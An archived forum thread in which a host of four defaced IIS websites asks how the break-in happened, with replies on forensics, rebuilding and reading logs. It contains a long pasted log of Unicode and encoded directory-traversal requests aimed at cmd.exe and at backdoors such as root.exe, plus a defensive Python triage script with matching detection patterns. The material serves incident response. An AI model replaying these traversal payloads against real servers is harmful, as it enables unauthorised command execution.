
Sites Hacked - No Traces 2


JordanR

Technical User
Oct 3, 2002
182
US
Hello,
This past weekend 4 websites that I host were hacked somehow. The only thing that I found was that the hacker changed the index.asp files to say "triad". Has this happened to anyone else? How can I find out how this happened and what to do to prevent this from happening again?
I do have a firewall appliance that gave no indication of a hack attack and the event log mentions nothing of the sort.

TIA,
Jordan
 
Guessing since you have index.asp files, IIS, yes?

Let's start with what you do know. You do know that there was a defacement of at least 4 websites. You do know that the attacker left the calling card "triad." It is almost 1 am here, so unfortunately I can't do a whole lot of checking around, but calling cards left can help you in a variety of ways, including telling you how they got in. Typically these calling cards are the name of the person/group that did the attack. With that, you can search around (there are several sites that keep databases of who did what defacement), and many times you can get an idea as to who specializes in what kind of attack. Maybe it was an attack on software you run on those websites. Maybe it was an attack on a buffer overflow vulnerability in the .idq mappings (which shouldn't be there anyway :p). Calling cards can also be "shoutouts" to friends, or someone/group they look up to. Maybe the calling card is a "hi" to a well-known attacker, and that's the kind of attacks that well-known attacker launched.

Now, to get away from the calling card, as it could be something, it could be nothing. What do your IIS access logs tell you? I didn't see you mention those. Perhaps they used a unicode directory traversal to launch tftp.exe and grab a file manager.

I have more to say, but as I said, it is late (or rather early :p) here, so my ramblings won't really be of much help to you right now, but hopefully the above will get you started. :)

----------------------------
"Security is like an onion" - Unknown
 
I haven't checked the IIS logs yet. I will do that in the morning. I will let you know what I find.
Thanks:)
 
Since you know you were hacked, I would say you can no longer trust any of the data on those PCs. Time to burn what you can save to a CDR, and reinstall the OS.

Make sure you have downloaded the service packs via a known clean PC -- The survival time of an unpatched Windows machine is now under 5 minutes (in other words: too short a time period to be downloading patches from WindowsUpdate).

Chip H.


____________________________________________________________________
If you want to get the best response to a question, please read FAQ222-2244 first
 
chiph: I agree with you, but I was under the impression that he wanted to find out what happened so he can prevent it in the future, be it a vulnerable webapp a customer was running, unpatched server, etc. Of course he'll want to take it offline.

----------------------------
"Security is like an onion" - Unknown
 
I have found in the default IIS logs some lines that look like hacker activity. I will post a part later for you guys to view.
I didn't know I was going to have to reinstall the OS.:(
 
JordanR: It is best to in a case like this as you can never be sure what the attacker did. Please do post the IIS logs when you get a chance. :)

----------------------------
"Security is like an onion" - Unknown
 
Here is the part of the IIS log that seems suspicious. I have replaced the computer's IP with xxx.xxx.xxx.xx
Code:
2004-12-05 08:27:14 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /msadc/..ü€€€€¯../..ü€€€€¯../..ü€€€€¯../winnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:14 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:14 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:14 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:14 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:15 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:15 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:15 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:16 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:16 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:16 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:16 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:16 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:16 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:17 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:17 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:17 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:17 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /_vti_cnf/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:18 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:18 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /adsamples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:18 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:18 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /c/winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:18 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /cgi-bin/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:20 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:20 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /d/winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:20 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /iisadmpwd/..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:20 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:21 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:21 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:21 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:21 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:21 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:22 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:22 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:22 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:22 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:23 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:23 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:23 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:23 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /msadc/..o../winnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:24 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /msadc/..Á%pc../..Á%pc../..Á%pc../winnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:24 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /msadc/..Á%pc../winnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:24 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:24 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:24 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /msadc/..ð€€¯../..ð€€¯../..ð€€¯../winnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:25 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /msadc/..ð€€¯../winnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:25 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /msadc/..ø€€€¯../..ø€€€¯../..ø€€€¯../winnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:25 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /msadc/..ø€€€¯../winnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:27 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /samples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:27 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:27 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/.%2e/.%2e/winnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:27 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:27 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:27 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:27 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:27 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:28 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:28 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/..%5c%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:28 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:28 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:29 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:29 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/..Á..Á..Á..Áwinnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:29 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:29 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/..À%9v../winnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:29 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:30 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/..À%qf../winnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:30 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:30 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/..Á%8s../winnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:30 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:31 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/..o../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:31 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/..Á%pc../winnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:31 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:31 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/..ð€€¯../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:32 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/..ø€€€¯../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:32 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/..ü€€€€¯../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:32 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/win32.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:32 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/test.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:33 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/sys.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:33 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/superlol.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:33 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/some.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:33 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/shell.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:34 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/serverdata.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:34 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/sensepost.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:34 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/monkey.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:34 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/lol.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:34 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/line.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:35 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/fun.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:35 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/exchange.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:35 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/echo.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:35 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/eXe.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:35 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/cmd2.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:37 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/cmd1.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:37 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/bs.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:37 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/boot.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:37 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/az.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:37 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/Serverdata.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:38 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/root.exe /c+dir+c:\ 404 Mozilla/??
 
Forgot the last piece.
Code:
Mozilla/??
2004-12-05 08:27:38 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/root.exe /c+dir+c:\ 404 Mozilla/??
 
Unless they were able to get through anyway (which is possible, I have never tested this on IIS, so I'm not sure what the result is), I don't see anything that succeeded.

A general idea of what happened from the sample of your logs:

The attacker used a mix of special characters and unicode to traverse up the directory to get to cmd.exe to get a directory listing of C:. They also searched for active backdoors, root.exe (from Code Red II) being among them. Unicode directory traversal is effective and quite deadly. However, I do not see evidence of defacement, unless they found a backdoor and used that.

----------------------------
"Security is like an onion" - Unknown
 
So, do you think I should still reinstall the OS?
I haven't rebooted the server since the last update this past Sunday. Will that help?
 
The big question is all the unknowns -- since they changed something on the site, you know they got at least part way in. What you don't know is where else on the machine (or local subnet) they went to. It doesn't look like they altered the IIS log (otherwise they would have removed all their false starts), so if you scroll further down in the file, you might be able to see where they successfully got in (where they stopped getting 404s and 500s).

Chip H.


____________________________________________________________________
If you want to get the best response to a question, please read FAQ222-2244 first
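A defender-side triage script for the log format in this thread, added here as an example (it is not from the thread or any of its posters). It parses W3C-format IIS lines like the ones posted above, decodes the `%5c`/`%2f`, double-encoded and raw non-ASCII traversal forms the attacker cycled through, flags requests that reach `cmd.exe` or known backdoor names such as `root.exe`, marks `OPTIONS`/`PROPFIND` as WebDAV reconnaissance, and separates failed probes (404/500) from ones that returned 2xx, which is the "where they stopped getting 404s and 500s" check Chip suggests. The sample lines are constructed (documentation IP ranges, not the thread's addresses), and the indicator names, the severity rule and the list of default virtual directories are my assumptions, drawn from paths that appear in the posted logs.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample (not the thread's logs) in the IIS W3C extended format seen above:
# date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
SAMPLE_LOG = r"""
2004-12-05 08:27:14 203.0.113.10 - 192.0.2.5 80 GET /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:17 203.0.113.10 - 192.0.2.5 80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:27 203.0.113.10 - 192.0.2.5 80 GET /scripts/.%2e/.%2e/winnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:29 203.0.113.10 - 192.0.2.5 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:38 203.0.113.10 - 192.0.2.5 80 GET /scripts/root.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:40:02 203.0.113.10 - 192.0.2.5 80 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir+c:\ 200 Mozilla/??
2004-12-05 17:32:12 198.51.100.7 - 192.0.2.5 80 GET /iisstart.asp - 200 waol.exe
2004-12-10 11:39:46 198.51.100.9 - 192.0.2.5 80 OPTIONS / - 200 Microsoft-WebDAV-MiniRedir/5.1.2600
2004-12-10 12:00:00 198.51.100.11 - 192.0.2.5 80 GET /index.asp - 200 Mozilla/4.0
"""

# Default IIS content touched by the thread's log lines; an assumed list, not authoritative.
DEFAULT_CONTENT = ("/iisstart.asp", "/iisadmpwd/", "/msadc/", "/samples/", "/adsamples/", "/scripts/")
TRAVERSAL_RE = re.compile(r"(?:^|/)\.\.(?:/|$)")             # a bare ".." segment after decoding
ENCODED_HIGH_BYTE_RE = re.compile(r"%[89a-fA-F][0-9a-fA-F]")  # %c0 / %c1 / %e0... style bytes
SHELL_RE = re.compile(r"/system32/|/(?:cmd|root)\.exe$")      # cmd.exe, or the Code Red II root.exe copy


def normalize_path(stem):
    """Decode twice (sees through %255c -> %5c -> \\), then treat backslashes as separators."""
    decoded = unquote(unquote(stem, errors="replace"), errors="replace")
    return decoded.replace("\\", "/").lower()


def parse_line(line):
    """Split one W3C log line into fields; returns None for blanks, #-headers and short lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) < 10:
        return None
    date, time_, client, _user, server, _port, method, stem, query, status = parts[:10]
    try:
        status = int(status)
    except ValueError:
        return None
    return {"time": f"{date} {time_}", "client": client, "server": server, "method": method,
            "stem": stem, "query": query, "status": status, "agent": " ".join(parts[10:]) or "-"}


def classify(entry):
    """Return the list of indicators a request matches (empty list means nothing suspicious)."""
    stem, norm = entry["stem"], normalize_path(entry["stem"])
    indicators = []
    if TRAVERSAL_RE.search(norm):
        indicators.append("traversal")
    # Raw non-ASCII (what IIS logs for overlong UTF-8) or percent-encoded high bytes in the path.
    if any(ord(c) > 0x7F for c in stem) or ENCODED_HIGH_BYTE_RE.search(stem):
        indicators.append("non_ascii_path")
    if SHELL_RE.search(norm):
        indicators.append("shell")
    if norm.startswith(DEFAULT_CONTENT):
        indicators.append("default_content")
    if entry["method"] in ("OPTIONS", "PROPFIND"):
        indicators.append("webdav_probe")
    return indicators


def severity(indicators):
    """Assumed rule: anything aiming at a shell or traversal is high; recon-only hits are low."""
    if {"traversal", "shell", "non_ascii_path"} & set(indicators):
        return "high"
    return "low" if indicators else None


def triage(log_text):
    """Collect suspicious requests and per-client counts; a 2xx on a high-severity hit is the alarm."""
    findings, per_client = [], {}
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        indicators = classify(entry)
        sev = severity(indicators)
        if sev is None:
            continue
        succeeded = 200 <= entry["status"] < 300
        findings.append({**entry, "indicators": indicators, "severity": sev, "succeeded": succeeded})
        stats = per_client.setdefault(entry["client"], Counter())
        stats["attempts"] += 1
        if succeeded and sev == "high":
            stats["high_success"] += 1
    return {"findings": findings, "per_client": per_client}


if __name__ == "__main__":
    summary = triage(SAMPLE_LOG)
    for f in summary["findings"]:
        flag = "SUCCEEDED" if f["succeeded"] else "failed"
        print(f"{f['time']} {f['client']:<14} {f['status']} {f['severity']:<4} {flag:<9} "
              f"{','.join(f['indicators'])} {f['stem']}")
    for client, stats in summary["per_client"].items():
        print(f"{client}: {stats['attempts']} suspicious requests, {stats['high_success']} high-severity 2xx")
```

Run it against a real log by passing the file's text to `triage()`; the one line worth a rebuild decision is any high-severity finding with `succeeded` set, since everything that answered 403/404/500 is noise the attacker left behind on the way to it.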
 
I didn't find where 24.198.58.220 had any success, but I did find the following:
Code:
2004-12-05 17:32:12 172.142.129.96 - 192.168.100.68 80 GET /iisstart.asp - 200 waol.exe

Does this look like a successful hack, or a hack at all?
What does 200 mean?
 
200 is a success code.

They were able to view the iisstart.asp page. This is one of the default pages that comes with IIS. When you rebuild your machine, you should make sure all that stuff gets deleted before you put your site(s) back on. It's a bad idea to leave that stuff lying around -- I don't know if there's a specific attack via them, but best to be safe.

Chip H.

____________________________________________________________________
If you want to get the best response to a question, please read FAQ222-2244 first
 
There's some chunked-encoding vulnerabilities with iisstart.asp, at least that I can find. No doubt there are others.

----------------------------
"Security is like an onion" - Unknown
 
Could someone explain what this line means:
2004-12-10 11:39:46 211.186.3.250 - 192.168.100.68 80 OPTIONS / - 200 Microsoft-WebDAV-MiniRedir/5.1.2600

Also, is there a tutorial somewhere on how to read the log files?

TIA
 
It means someone from 211.186.3.250, connecting to IP 192.168.100.68 on port 80, used WebDAV on Windows XP to get the OPTIONS list from your server.

for more information.

As for reading log files, I just learned by trial and error (and am still learning).

However, try these on for size:

----------------------------
"Security is like an onion" - Unknown
 